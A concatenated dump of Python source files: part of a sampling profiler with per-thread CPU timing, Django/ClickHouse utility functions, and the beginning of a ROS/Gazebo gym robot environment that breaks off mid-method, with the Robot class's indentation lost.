                signal.setitimer(self.timer, self.get_next_interval(), 0)
        signal.signal(self.signal, signal_handler)
        # Restart interrupted system calls instead of failing with EINTR.
        signal.siginterrupt(self.signal, False)
        self._run = True
        signal.setitimer(self.timer, self.get_next_interval(), 0)

    def _stop(self):
        self._run = False
        # Disarm the timer; a handler already in flight sees _run == False
        # and will not re-arm.
        signal.setitimer(self.timer, 0, 0)
# - Platform-specific stuff ----------------------------------------------------
import thread
import threading
class ThreadPlatform(object):
    """Base class for platform-specific per-thread CPU time queries.

    Also provides optional patching of `thread.start_new_thread` so a mapping
    from Python thread idents to native thread IDs can be maintained.
    """
    def __init__(self):
        self.name = ''
        self.lock = threading.Lock()
        self._registered_threads = {}  # Python ident -> native thread ID
        self._original_start_new_thread = thread.start_new_thread
        self.platform_init()

    def _patch_thread(self):
        """Wrap thread creation so every new thread registers its native ID."""
        assert threading.current_thread().name == 'MainThread'
        with self.lock:
            self._registered_threads[threading.current_thread().ident] = self.get_current_thread_id()
        def start_new_thread_wrapper(func, args, kwargs={}):
            def thread_func(func, args, kwargs):
                # Runs inside the new thread: record its native ID first.
                system_tid = self.get_current_thread_id()
                with self.lock:
                    self._registered_threads[threading.current_thread().ident] = system_tid
                return func(*args, **kwargs)
            return self._original_start_new_thread(thread_func, (func, args, kwargs))
        thread.start_new_thread = start_new_thread_wrapper
        threading._start_new_thread = start_new_thread_wrapper

    def _unpatch_thread(self):
        """Restore the original thread-creation functions and forget IDs."""
        with self.lock:
            self._registered_threads = {}
        # Bug fix: these previously assigned the bare name
        # `_original_start_new_thread`, which raised NameError when called.
        thread.start_new_thread = self._original_start_new_thread
        threading._start_new_thread = self._original_start_new_thread

    def _get_patched_thread_id(self, python_ident):
        #with self.lock:
        return self._registered_threads.get(python_ident)

    # --- Platform interface: sub-classes must implement these -------------
    def platform_init(self):
        raise NotImplementedError()

    def get_thread_id_from_python_ident(self, python_ident):
        raise NotImplementedError()

    def get_current_thread_id(self):
        raise NotImplementedError()

    def get_thread_cpu_time(self, thread_id=None):
        raise NotImplementedError()
# Single-threaded CPU times using os.times(),
# which actually gives CPU times for the whole
# process.
# Will give bad results if there are actually
# other threads running!
class SingleThreadedPlatform(ThreadPlatform):
    """Fallback platform: CPU times via os.times(), which actually reports
    times for the whole process.  Will give bad results if other threads
    are actually running!
    """
    def platform_init(self):
        pass
    def get_thread_id_from_python_ident(self, python_ident):
        # Bug fix: now accepts python_ident, matching the base-class
        # interface (the override previously took no argument and raised
        # TypeError when called through the ThreadPlatform API).
        return 0
    def get_current_thread_id(self):
        return 0
    def get_thread_cpu_time(self, thread_id=None):
        # user + system CPU time for the whole process
        time_info = os.times()
        return time_info[0] + time_info[1]
class MacPThreadPlatform(ThreadPlatform):
    """Per-thread CPU times on macOS via mach_thread_self()/thread_info().

    Relies on _patch_thread() so Python thread idents can be mapped to
    Mach thread ports.
    """
    def platform_init(self):
        import ctypes
        import ctypes.util
        libc = ctypes.CDLL(ctypes.util.find_library('libc'))
        # mach_thread_self() returns the Mach port of the calling thread.
        self._mach_thread_self = libc.mach_thread_self
        self._mach_thread_self.restype = ctypes.c_uint
        # TODO: check these field definitions
        class time_value_t(ctypes.Structure):
            _fields_ = [
                ("seconds", ctypes.c_int),
                ("microseconds",ctypes.c_int)
            ]
        class thread_basic_info(ctypes.Structure):
            _fields_ = [
                ("user_time", time_value_t),
                ("system_time",time_value_t),
                ("cpu_usage",ctypes.c_int),
                ("policy",ctypes.c_int),
                ("run_state",ctypes.c_int),
                ("flags",ctypes.c_int),
                ("suspend_count",ctypes.c_int),
                ("sleep_time",ctypes.c_int)
            ]
        thread_info = libc.thread_info
        thread_info.restype = ctypes.c_int
        thread_info.argtypes = [
            ctypes.c_uint,
            ctypes.c_int,
            ctypes.POINTER(thread_basic_info),
            ctypes.POINTER(ctypes.c_uint)
        ]
        self._thread_info = thread_info
        self._THREAD_BASIC_INFO = 3
        # Shared output struct/count reused across calls to avoid per-tick allocs.
        self._out_info = thread_basic_info()
        # NOTE(review): under Python 3 this `/` yields a float, which
        # ctypes.c_uint rejects -- would need `//` for Py3 compatibility.
        self._count = ctypes.c_uint(ctypes.sizeof(self._out_info) / ctypes.sizeof(ctypes.c_uint))
        self._patch_thread()
    def get_thread_id_from_python_ident(self, python_ident):
        return self._get_patched_thread_id(python_ident)
    def get_current_thread_id(self):
        return self._mach_thread_self()
    def get_thread_cpu_time(self, python_ident=None):
        """Return user+system CPU seconds for the given Python thread ident
        (default: the calling thread); 0.0 if thread_info() fails."""
        import ctypes
        # TODO: Optimize with shared structs, sizes, to minimize allocs per tick
        if python_ident is None:
            thread_id = self.get_current_thread_id()
        else:
            thread_id = self.get_thread_id_from_python_ident(python_ident)
        out_info = self._out_info
        result = self._thread_info(
            thread_id,
            self._THREAD_BASIC_INFO,
            ctypes.byref(out_info),
            ctypes.byref(self._count),
        )
        if result != 0:
            return 0.0
        user_time = out_info.user_time.seconds + out_info.user_time.microseconds / 1000000.0
        system_time = out_info.system_time.seconds + out_info.system_time.microseconds / 1000000.0
        return user_time + system_time
class LinuxPThreadPlatform(ThreadPlatform):
    """Per-thread CPU times on Linux via pthread_getcpuclockid() and
    clock_gettime().
    """
    def platform_init(self):
        import ctypes
        import ctypes.util
        pthread = ctypes.CDLL(ctypes.util.find_library('pthread'))
        libc = ctypes.CDLL(ctypes.util.find_library('c'))
        pthread_t = ctypes.c_ulong
        clockid_t = ctypes.c_long
        time_t = ctypes.c_long
        NANOSEC = 1.0 / 1e9
        CLOCK_THREAD_CPUTIME_ID = 3 # from linux/time.h
        class timespec(ctypes.Structure):
            _fields_ = [
                ('tv_sec', time_t),
                ('tv_nsec', ctypes.c_long),
            ]
        # wrap pthread_self()
        pthread_self = pthread.pthread_self
        # Bug fix: argtypes was previously set on the *library* object
        # (`pthread.argtypes`) instead of the function.
        pthread_self.argtypes = []
        pthread_self.restype = pthread_t
        # wrap pthread_getcpuclockid()
        pthread_getcpuclockid = pthread.pthread_getcpuclockid
        pthread_getcpuclockid.argtypes = [pthread_t, ctypes.POINTER(clockid_t)]
        pthread_getcpuclockid.restype = clockid_t
        # wrap clock_gettime()
        clock_gettime = libc.clock_gettime
        clock_gettime.argtypes = [clockid_t, ctypes.POINTER(timespec)]
        clock_gettime.restype = ctypes.c_int
        def get_current_thread_id():
            return pthread_self()
        def get_thread_cpu_time(thread_id=None):
            """CPU seconds used by thread_id (default: calling thread);
            None if the thread's CPU clock cannot be queried."""
            if thread_id is None:
                thread_id = pthread_self()
            # First, get the thread's CPU clock ID
            clock_id = clockid_t()
            error = pthread_getcpuclockid(thread_id, ctypes.pointer(clock_id))
            if error:
                return None
            # Now get time from clock...
            result = timespec()
            error = clock_gettime(clock_id, ctypes.pointer(result))
            if error:
                return None
            cpu_time = result.tv_sec + result.tv_nsec * NANOSEC
            return cpu_time
        self._get_current_thread_id = get_current_thread_id
        self._get_thread_cpu_time = get_thread_cpu_time
    def get_current_thread_id(self):
        return self._get_current_thread_id()
    def get_thread_cpu_time(self, thread_id=None):
        # Bug fix: this method previously lacked `self`, so every call via
        # an instance raised TypeError.
        return self._get_thread_cpu_time(thread_id)
import sys
# Pick the thread-timing backend for the current platform.
if sys.platform == 'darwin':
    thread_platform = MacPThreadPlatform()
elif sys.platform.startswith('linux'):
    # Bug fix: Python 2 reports 'linux2' (and old kernels 'linux3'), so an
    # equality test against 'linux' never matched there; use a prefix match.
    thread_platform = LinuxPThreadPlatform()
# TODO: Windows support
else:
    try:
        import thread
    except ImportError:
        pass
    else:
        import warnings
        warnings.warn('Multi-threaded CPU times not supported on this platform!')
    thread_platform = SingleThreadedPlatform()
# - Sample data ----------------------------------------------------------------
import collections
StackLine = collections.namedtuple('StackLine', ['type', 'name', 'file', 'line', 'data'])

def stack_line_from_frame(frame, stype='func', data=None):
    """Build a StackLine record describing the code object of `frame`."""
    code_obj = frame.f_code
    return StackLine(
        stype,
        code_obj.co_name,
        code_obj.co_filename,
        code_obj.co_firstlineno,
        data,
    )
class SampleData(object):
    """Accumulated sample counters for one unique stack."""
    __slots__ = ['rtime', 'cputime', 'ticks']

    def __init__(self):
        # Real / wall-clock time attributed to this stack
        self.rtime = 0.0
        # User CPU time (single thread)
        self.cputime = 0.0
        # Actual number of samples taken
        self.ticks = 0

    def __str__(self):
        return 'SampleData<r=%.3f, cpu=%.3f, t=%d>' % (self.rtime, self.cputime, self.ticks)

    def __repr__(self):
        return str(self)
class RawProfileData(object):
    """Interned storage for profile samples.

    StackLines and stack tuples are interned to small integer IDs so that
    per-stack SampleData can be accumulated compactly.
    """
    def __init__(self):
        self.stack_line_id_map = {} # Maps StackLines to IDs
        self.stack_tuple_id_map = {} # Map tuples of StackLine IDs to IDs
        self.stack_data = {} # Maps stack ID tuples to SampleData
        self.time_running = 0.0 # Total amount of time sampling has been active
        self.total_ticks = 0 # Total number of samples we've taken
    def add_sample_data(self, stack_list, rtime, cputime, ticks):
        """Accumulate one sample for the given stack (a list of StackLines)."""
        sm = self.stack_line_id_map
        sd = self.stack_line_id_map.setdefault
        # Intern each StackLine, assigning the next free ID on first sight.
        stack_tuple = tuple(
            sd(stack_line, len(sm))
            for stack_line in stack_list
        )
        # Intern the whole stack tuple the same way.
        stack_tuple_id = self.stack_tuple_id_map.setdefault(
            stack_tuple,
            len(self.stack_tuple_id_map),
        )
        if stack_tuple_id in self.stack_data:
            sample_data = self.stack_data[stack_tuple_id]
        else:
            sample_data = self.stack_data[stack_tuple_id] = SampleData()
        sample_data.rtime += rtime
        sample_data.cputime += cputime
        sample_data.ticks += ticks
        self.total_ticks += ticks
    def dump(self, sort='rtime'):
        """Print a flat per-stack summary sorted (descending) by the given
        SampleData field: 'rtime', 'cputime' or 'ticks'.
        (Python 2 print-statement syntax.)
        """
        assert sort in SampleData.__slots__
        # Quick util function to dump raw data in a vaguely-useful format
        # TODO: replace with proper text exporter with sort parameters, etc.
        print '%s:\n\n %d samples taken in %.3fs:\n' % (
            self.__class__.__name__,
            self.total_ticks,
            self.time_running,
        )
        print ' Ordered by: %s\n' % sort
        # Invert stack -> ID map
        stack_line_map = dict([
            (v, k)
            for k, v
            in self.stack_line_id_map.items()
        ])
        # Invert stack-tuple -> ID map as well.
        stack_map = dict([
            (v, k)
            for k, v
            in self.stack_tuple_id_map.items()
        ])
        # Decorate with the sort key, then sort descending.
        lines = [
            (getattr(sample_data, sort), stack_id, sample_data)
            for stack_id, sample_data
            in self.stack_data.items()
        ]
        lines.sort()
        lines.reverse()
        print ' ticks rtime cputime filename:lineno(function)'
        for _, stack_id, sample_data in lines:
            stack = stack_map[stack_id]
            # stack[0] is the innermost frame of this stack.
            stack_line = stack_line_map[stack[0]]
            print ' %7d % 8.3f % 8.3f %s:%d(%s) : %r' % (
                sample_data.ticks,
                sample_data.rtime,
                sample_data.cputime,
                os.path.basename(stack_line.file),
                stack_line.line,
                stack_line.name,
                stack,
            )
        print
class ThreadClock(object):
    """Per-thread bookkeeping of the most recently observed clocks."""
    __slots__ = ['rtime', 'cputime']

    def __init__(self):
        self.rtime = 0.0    # last wall-clock reading
        self.cputime = 0.0  # last per-thread CPU time reading
class Profiler(object):
    """Statistical sampling profiler.

    A scheduler periodically invokes sample(), which records the call stack
    of every running thread together with elapsed real and per-thread CPU
    time, accumulating results in a RawProfileData instance.
    """
    _scheduler_map = {
        'signal':SignalIntervalScheduler,
        'thread':ThreadIntervalScheduler
    }
    def __init__(
        self,
        scheduler_type='signal', # Which scheduler to use ('signal'/'thread' or an instance)
        collect_stacks=True,     # Collect full call-tree data?
        rate=None,               # Samples/sec (default: the scheduler's default_rate)
        stochastic=False,        # Randomize sample intervals to avoid aliasing
    ):
        self.collect_stacks = collect_stacks
        assert (
            scheduler_type in self._scheduler_map
            or isinstance(scheduler_type, IntervalScheduler)
        ), 'Unknown scheduler type'
        self.scheduler_type = scheduler_type
        if isinstance(scheduler_type, str):
            scheduler_type = self._scheduler_map[scheduler_type]
        if rate is None:
            rate = scheduler_type.default_rate
        self._scheduler = scheduler_type(
            self.sample,
            interval=1.0/rate,
            stochastic=stochastic,
        )
        self.reset()
    def reset(self):
        """Discard all collected data and bookkeeping state."""
        self._profile_data = RawProfileData()
        self._thread_clocks = {} # Maps from thread ID to ThreadClock
        # Bug fix: this previously initialised `self._last_tick`, which
        # nothing reads -- sample() and start() use `self.last_tick`, so a
        # sample before start() raised AttributeError.
        self.last_tick = 0
        self.total_samples = 0
        self.sampling_time = 0.0 # Time spent inside sample() itself
        self._empty_stack = [StackLine(None, 'null', '', 0, None)]
        self._start_time = 0.0
    def sample(self, _interrupted_frame=None):
        """Take one sample of every thread's stack (called by the scheduler).

        _interrupted_frame is the frame the scheduler interrupted in the
        current thread (or None); it replaces this thread's own frames so the
        profiler does not pollute its own data.
        """
        sample_time = time.time()
        current_frames = sys._current_frames()
        current_thread = thread.get_ident()
        for thread_ident, frame in current_frames.items():
            if thread_ident == current_thread:
                frame = _interrupted_frame
            if frame is not None:
                stack = [stack_line_from_frame(frame)]
                if self.collect_stacks:
                    frame = frame.f_back
                    while frame is not None:
                        stack.append(stack_line_from_frame(frame))
                        frame = frame.f_back
                stack.append(StackLine('thread', str(thread_ident), '', 0, None)) # todo: include thread name?
                # todo: include PID?
                # todo: include custom metadata/labels?
                thread_clock = self._thread_clocks.get(thread_ident)
                if thread_clock is None:
                    thread_clock = self._thread_clocks[thread_ident] = ThreadClock()
                cputime = thread_platform.get_thread_cpu_time(thread_ident)
                self._profile_data.add_sample_data(
                    stack,
                    sample_time - self.last_tick,
                    cputime - thread_clock.cputime,
                    1
                )
                thread_clock.cputime = cputime
            else:
                # No frame available for this thread; attribute the time to
                # a synthetic 'null' stack.
                self._profile_data.add_sample_data(
                    self._empty_stack, sample_time - self.last_tick, 0.0, 1
                )
        self.last_tick = sample_time
        self.total_samples += 1
        self.sampling_time += time.time() - sample_time
    def start(self):
        """Snapshot CPU clocks of existing threads and start sampling."""
        import threading
        # reset thread clocks...  (loop variable renamed from `thread` to
        # avoid shadowing the `thread` module used by sample())
        self._thread_clocks = {}
        for th in threading.enumerate():
            thread_clock = ThreadClock()
            self._thread_clocks[th.ident] = thread_clock
            thread_clock.cputime = thread_platform.get_thread_cpu_time(th.ident)
        self._start_time = self.last_tick = time.time()
        self._scheduler.start()
    @contextmanager
    def activated(self):
        """Context manager: profile the enclosed block, always stopping."""
        try:
            self.start()
            yield self
        finally:
            self.stop()
    def stop(self):
        """Stop sampling and account the elapsed running time."""
        self._scheduler.stop()
        self._profile_data.time_running += time.time() - self._start_time
        self._start_time = 0.0
def busy(rate=100):
    """Spin in a sleep loop under the profiler until interrupted (Ctrl-C).

    Returns the Profiler instance so its data can be inspected or dumped.
    """
    import time
    profiler = Profiler(rate=rate)
    try:
        with profiler.activated():
            while True:
                time.sleep(1)
    except KeyboardInterrupt:
        pass
    return profiler
|
utils.py | import datetime
from queue import Queue, Empty
from threading import Thread
import os
from itertools import chain
from typing import Union, Any, Optional, TypeVar, Set, Dict, Iterable, Tuple, Iterator, Callable, List
import pytz
import six
from importlib import import_module
from importlib.util import find_spec
from django.db.models import Model as DjangoModel
from .database import connections
T = TypeVar('T')
def get_tz_offset(db_alias: Optional[str] = None) -> int:
    """
    Returns ClickHouse server timezone offset in minutes
    :param db_alias: The database alias used
    :return: Integer
    """
    conn = connections[db_alias]
    offset = conn.server_timezone.utcoffset(datetime.datetime.utcnow())
    return int(offset.total_seconds() / 60)
def format_datetime(dt: Union[datetime.date, datetime.datetime], timezone_offset: int = 0, day_end: bool = False,
                    db_alias: Optional[str] = None) -> str:
    """
    Formats datetime and date objects to format that can be used in WHERE conditions of query
    :param dt: datetime.datetime or datetime.date object
    :param timezone_offset: timezone offset (minutes)
    :param day_end: If datetime.date is given and flag is set, returns day end time, not day start.
    :param db_alias: The database alias used
    :return: A string representing datetime
    """
    assert isinstance(dt, (datetime.datetime, datetime.date)), "dt must be datetime.datetime instance"
    assert type(timezone_offset) is int, "timezone_offset must be integer"
    # datetime.datetime inherits datetime.date, so isinstance() can't tell
    # them apart; promote plain dates to a day-start or day-end datetime.
    if not isinstance(dt, datetime.datetime):
        boundary = datetime.time.max if day_end else datetime.time.min
        dt = datetime.datetime.combine(dt, boundary)
    # Normalise to UTC: attach UTC to naive values, convert aware ones.
    if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
        dt = pytz.utc.localize(dt)
    else:
        dt = dt.astimezone(pytz.utc)
    # ClickHouse parses dates in the server's local timezone, so shift by the
    # difference between the requested offset and the server's own offset.
    shift = datetime.timedelta(minutes=timezone_offset - get_tz_offset(db_alias))
    return (dt - shift).strftime("%Y-%m-%d %H:%M:%S")
def module_exists(module_name: str) -> bool:
    """
    Checks whether a module can be located without importing it
    :param module_name: Dot-separated module name
    :return: Boolean
    """
    # find_spec (Python 3.4+) returns None when the module is not found
    return find_spec(module_name) is not None
def lazy_class_import(obj: Union[str, Any]) -> Any:
    """
    If a string is given, imports the object by its dotted module path.
    Otherwise returns the object unchanged.
    :param obj: A string class path or object to return
    :return: Imported object
    :raises ImportError: If the module exists but lacks the named attribute
    """
    # `str` replaces six.string_types: this module targets Python 3 only
    # (it already uses `from queue import Queue` and typing annotations),
    # so the six dependency is unnecessary here.
    if not isinstance(obj, str):
        return obj
    module_name, obj_name = obj.rsplit('.', 1)
    module = import_module(module_name)
    try:
        return getattr(module, obj_name)
    except AttributeError:
        raise ImportError('Invalid import path `%s`' % obj)
def get_subclasses(cls: T, recursive: bool = False) -> Set[T]:
    """
    Gets all subclasses of the given class.
    Attention!!! Classes are only found if they were imported before calling this function
    :param cls: Class to get subclasses of
    :param recursive: If flag is set, also returns subclasses of subclasses, and so on
    :return: A set of subclasses
    """
    found = set(cls.__subclasses__())
    if recursive:
        # Snapshot the direct subclasses before extending the set in place.
        for direct in list(found):
            found |= get_subclasses(direct, recursive=True)
    return found
def model_to_dict(instance: DjangoModel, fields: Optional[Iterable[str]] = None,
                  exclude_fields: Optional[Iterable[str]] = None) -> Dict[str, Any]:
    """
    Standard model_to_dict ignores some fields if they have invalid naming
    :param instance: Object to convert to dictionary
    :param fields: Field list to extract from instance
    :param exclude_fields: Field list to exclude from extraction
    :return: Serialized dictionary
    """
    if not fields:
        # No explicit field list: collect every field name from model meta.
        opts = instance._meta
        fields = {f.name for f in chain(opts.concrete_fields, opts.private_fields, opts.many_to_many)}
    result = {}
    for name in set(fields) - set(exclude_fields or set()):
        value = getattr(instance, name, None)
        if value is not None:
            result[name] = value
    return result
def check_pid(pid):
    """
    Check for the existence of a unix pid by sending signal 0 (no-op probe).
    """
    try:
        os.kill(pid, 0)
    except OSError:
        # No such process (or no permission to signal it under some kernels)
        return False
    return True
def int_ranges(items: Iterable[int]) -> Iterator[Tuple[int, int]]:
    """
    Finds continuous intervals in an integer iterable.
    :param items: Items to search in
    :return: Iterator over Tuple[start, end] (both ends inclusive)
    """
    start = end = None
    for value in sorted(items):
        if end is None:
            # First value opens the first interval.
            start = end = value
        elif value == end + 1:
            # Still contiguous: extend the current interval.
            end = value
        else:
            # Gap found: emit the finished interval and open a new one.
            completed = (start, end)
            start = end = value
            yield completed
    if end is not None:
        # Emit the trailing interval (nothing was yielded for empty input).
        yield start, end
class ExceptionThread(Thread):
    """
    Thread subclass which captures exceptions raised inside the thread and
    re-raises them in the thread that calls join().
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.exc = None  # exception raised inside run(), if any

    def _close_django_db_connections(self):
        """
        In Django every thread has its own database connection pool,
        but django does not close them automatically in child threads.
        As a result, this can cause database connection leaking.
        Here we close connections manually when thread execution is finished.
        """
        try:
            from django.db import connections as db_connections
        except (ModuleNotFoundError, ImportError):
            db_connections = None
        if db_connections:
            db_connections.close_all()

    def run(self):
        try:
            return super().run()
        except Exception as err:
            # Remember the failure; join() will re-raise it for the caller.
            self.exc = err
        finally:
            self._close_django_db_connections()

    def join(self, timeout=None):
        super().join(timeout=timeout)
        if self.exc:
            raise self.exc
def exec_in_parallel(func: Callable, args_queue: Queue, threads_count: Optional[int] = None) -> List[Any]:
    """
    Executes func in multiple threads in parallel.
    func is expected to be thread safe; if it needs locks, it must provide them.
    :param func: Function to execute in a thread
    :param args_queue: Queue of call arguments; each element is a tuple (args, kwargs)
    :param threads_count: Maximum number of parallel threads to run
    :return: A list of results. Order is not guaranteed; element type depends on func.
    """
    results = []
    # Without an explicit limit run everything at once; never spawn more
    # workers than there are queued tasks.
    pending = args_queue.qsize()
    worker_count = min(pending, threads_count) if threads_count else pending

    def _drain_queue():
        """
        Worker body: pull tasks until the queue is exhausted.
        list.append is atomic in CPython, so collecting results needs no lock:
        http://effbot.org/pyfaq/what-kinds-of-global-value-mutation-are-thread-safe.htm
        """
        while True:
            try:
                call_args, call_kwargs = args_queue.get_nowait()
            except Empty:
                # No data in queue: this worker is done.
                return
            results.append(func(*call_args, **call_kwargs))
            args_queue.task_done()

    workers = [ExceptionThread(target=_drain_queue) for _ in range(worker_count)]
    for worker in workers:
        worker.start()
    # Wait for all workers to finish (join re-raises worker exceptions).
    for worker in workers:
        worker.join()
    return results
def exec_multi_arg_func(func: Callable, split_args: Iterable[Any], *args, threads_count: Optional[int] = None,
                        **kwargs) -> List[Any]:
    """
    Executes function in parallel threads. Each thread calls func with one of
    split_args as its first argument; args and kwargs are passed along too.
    If split_args has at most one element, no extra threads are started.
    :param func: Function to execute. Must accept a split_arg as first parameter
    :param split_args: A list of arguments to split threads by
    :param threads_count: Maximum number of threads to run in parallel
    :return: A list of execution results. Order of execution is not guaranteed.
    """
    split_args = list(split_args)
    if not split_args:
        return []
    if len(split_args) == 1:
        # Single task: run inline in the current thread.
        return [func(split_args[0], *args, **kwargs)]
    tasks = Queue()
    for first_arg in split_args:
        tasks.put(([first_arg] + list(args), kwargs))
    return exec_in_parallel(func, tasks, threads_count=threads_count)
class SingletonMeta(type):
    """
    Metaclass implementing the singleton pattern: the first instantiation of
    each class is cached and returned by every later call.
    """
    _instances = {}

    def __call__(cls, *args, **kwargs):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super().__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
gym_gazeboros.py | #!/usr/bin/env python
from datetime import datetime
import copy
import traceback
import os, subprocess, time, signal
#from cv_bridge import CvBridge
import gym
import math
import random
# u
import numpy as np
import cv2 as cv
import rospy
# Brings in the SimpleActionClient
import actionlib
# Brings in the .action file and messages used by the move base action
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from squaternion import quat2euler
from squaternion import euler2quat
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Image
from gazebo_msgs.msg import ModelState
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import TransformStamped
from rosgraph_msgs.msg import Clock
from costmap_converter.msg import ObstacleArrayMsg
from costmap_converter.msg import ObstacleMsg
from gazebo_msgs.msg import ModelStates
from geometry_msgs.msg import Twist, PoseStamped  # PoseStamped added
from gazebo_msgs.srv import SetModelState
import threading
from gym.utils import seeding
import _thread
from squaternion import quat2euler
from squaternion import euler2quat
from simple_pid import PID
import pickle
import logging
logger = logging.getLogger(__name__)
class History():
    """Fixed-size ring buffer of timestamped samples.

    Elements are written at up to `save_rate` Hz into a buffer sized to cover
    `window_size` output samples read back at `update_rate` Hz; get_elemets()
    returns `window_size` entries spaced according to the measured frame rate.
    """
    def __init__(self, window_size, update_rate, save_rate=10):
        self.idx = 0
        self.update_rate = update_rate
        self.save_rate = save_rate
        self.lock = threading.Lock()
        # Enough slots to span window_size output samples at update_rate
        # while writing at save_rate (plus one spare).
        self.memory_size = int(math.ceil(save_rate/update_rate*window_size)+1)
        self.data = [None for x in range(self.memory_size)]
        # Start one second in the past so the very first add_element() passes
        # the rate-limit check.
        self.prev_add_time = rospy.Time.now().to_sec() - 1
        self.window_size = window_size
        # Measured write rate in Hz; None until enough samples have arrived.
        self.avg_frame_rate = None
        self.time_data_= []
    def add_element(self, element):
        """
        element: the data that we put inside the history data array
        """
        # Drop samples that arrive faster than save_rate.
        if abs(rospy.Time.now().to_sec() - self.prev_add_time) < 1./self.save_rate:
            return
        with self.lock:
            # NOTE(review): idx wraps modulo window_size although data has
            # memory_size slots -- confirm this is intended.
            self.idx = (self.idx + 1) % self.window_size
            self.prev_add_time = rospy.Time.now().to_sec()
            if self.data[self.idx] is None:
                # First real sample: back-fill the whole buffer with it so
                # readers never see None entries.
                for idx in range(self.memory_size):
                    self.data[idx] = element
            self.data[self.idx] = element
            # Collect up to ~50 timestamps to estimate the actual write rate.
            if not len(self.time_data_) > 50:
                self.time_data_.append(self.prev_add_time)
            if len(self.time_data_) > 3:
                prev_t = self.time_data_[0]
                time_intervals = []
                for t in self.time_data_[1:]:
                    time_intervals.append(t - prev_t)
                    prev_t = t
                self.avg_frame_rate = 1.0 / np.average(time_intervals)
    def get_elemets(self):
        """Return window_size elements, newest first, stepping backwards by
        the measured-frame-rate/update-rate ratio.  Blocks until the frame
        rate has been estimated."""
        return_data = []
        while self.avg_frame_rate is None:
            time.sleep(0.1)
        # Negative step: walk backwards through the ring buffer.
        skip_frames = -int(math.ceil(self.avg_frame_rate / self.update_rate))
        with self.lock:
            index = self.idx #(self.idx - 1)% self.window_size
            if self.window_size * abs(skip_frames) >= self.memory_size:
                rospy.logerr("error in get element memory not enough update rate{} avg_frame_rate{} mem_size {} skipf: {}".format(self.update_rate, self.avg_frame_rate, self.memory_size, skip_frames))
            for i in range (self.window_size):
                return_data.append(self.data[index])
                index = (index + skip_frames) % self.window_size
        return return_data
    def get_latest(self):
        """Return the most recently stored element."""
        with self.lock:
            return self.data[self.idx]
class Robot():
def __init__(self, name, max_angular_speed=1, max_linear_speed=1, relative=None, agent_num=None, use_goal=False, use_movebase=False, use_jackal=False, window_size=10, is_testing=False):
self.name = name
self.use_jackal = use_jackal
self.init_node = False
self.alive = True
self.prev_call_gazeboros_ = None
if relative is None:
relative = self
self.relative = relative
self.is_testing = is_testing
if self.is_testing:
self.all_pose_ = []
self.last_time_added = rospy.Time.now().to_sec()
self.log_history = []
self.agent_num = agent_num
self.init_node = True
self.deleted = False
self.update_rate_states = 2.0
self.window_size_history = window_size
self.current_vel_ = Twist()
self.goal = {"pos": None, "orientation": None}
self.use_goal = use_goal
self.use_movebase = use_movebase
self.max_angular_vel = max_angular_speed
self.max_linear_vel = max_linear_speed
self.max_rel_pos_range = 5.0 # meter
self.width_laserelement_image = 100
self.height_laser_image = 50
self.state_ = {'position': (None, None),
'orientation': None}
if self.use_jackal:
self.cmd_vel_pub = rospy.Publisher('/{}/jackal_velocity_controller/cmd_vel'.format(name), Twist, queue_size=1)
else:
self.cmd_vel_pub = rospy.Publisher('/{}/cmd_vel'.format(name), Twist, queue_size=1)
if "tb3" in self.name and self.use_movebase:
# Create an action client called "move_base" with action definition file "MoveBaseAction"
self.action_client_ = actionlib.SimpleActionClient('/move_base_{}'.format(self.agent_num),MoveBaseAction)
# Waits until the action server has started up and started listening for goals.
self.action_client_.wait_for_server(rospy.rostime.Duration(0.4))
else:
self.action_client_ = None
if "person" is self.name:
self.angular_pid = PID(0.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(1.0, 0, 0.05, setpoint=0)
else:
self.angular_pid = PID(2.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(2.5, 0, 0.05, setpoint=0)
self.pos_history = History(self.window_size_history, self.update_rate_states)
self.orientation_history = History(self.window_size_history, self.update_rate_states)
self.velocity_history = History(self.window_size_history, self.update_rate_states)
self.is_collided = False
self.is_pause = False
self.reset = False
self.scan_image = None
def calculate_ahead(self, distance):
x = self.state_['position'][0] + math.cos(self.state_["orientation"]) * distance
y = self.state_['position'][1] + math.sin(self.state_["orientation"]) * distance
return (x,y)
def movebase_cancel_goals(self):
self.action_client_.cancel_all_goals()
self.stop_robot()
    def movebase_client_goal(self, goal_pos, goal_orientation):
        """Send an (x, y, yaw) goal to this agent's move_base action server.

        Fire-and-forget: does not wait for the result (the commented block
        below shows the synchronous variant).
        """
        # Creates a new goal with the MoveBaseGoal constructor
        move_base_goal = MoveBaseGoal()
        move_base_goal.target_pose.header.frame_id = "tb3_{}/odom".format(self.agent_num)
        move_base_goal.target_pose.header.stamp = rospy.Time.now()
        move_base_goal.target_pose.pose.position.x = goal_pos[0]
        move_base_goal.target_pose.pose.position.y = goal_pos[1]
        quaternion_rotation = euler2quat(0, goal_orientation, 0)
        # NOTE(review): the component mapping below (x<-[3], y<-[1], z<-[2],
        # w<-[0]) looks permuted relative to a (w, x, y, z) quaternion tuple
        # -- confirm against squaternion's euler2quat return order before
        # relying on it.
        move_base_goal.target_pose.pose.orientation.x = quaternion_rotation[3]
        move_base_goal.target_pose.pose.orientation.y = quaternion_rotation[1]
        move_base_goal.target_pose.pose.orientation.z = quaternion_rotation[2]
        move_base_goal.target_pose.pose.orientation.w = quaternion_rotation[0]
        # Sends the move_base_goal to the action server.
        self.action_client_.send_goal(move_base_goal)
        # Waits for the server to finish performing the action.
        #wait = self.action_client_.wait_for_result(rospy.rostime.Duration(0.4))
        # If the result doesn't arrive, assume the Server is not available
        # if not wait:
        #     rospy.logerr("Action server not available!")
        # else:
        #     # Result of executing the action
        #     return self.action_client_.get_result()
def get_pos(self):
counter_problem = 0
while self.state_['position'] is None:
if self.reset:
return (None, None)
if counter_problem > 20:
rospy.logdebug("waiting for pos to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.001)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
return self.state_['position']
def get_orientation(self):
counter_problem = 0
while self.state_['orientation'] is None:
if self.reset:
return None
if counter_problem > 20:
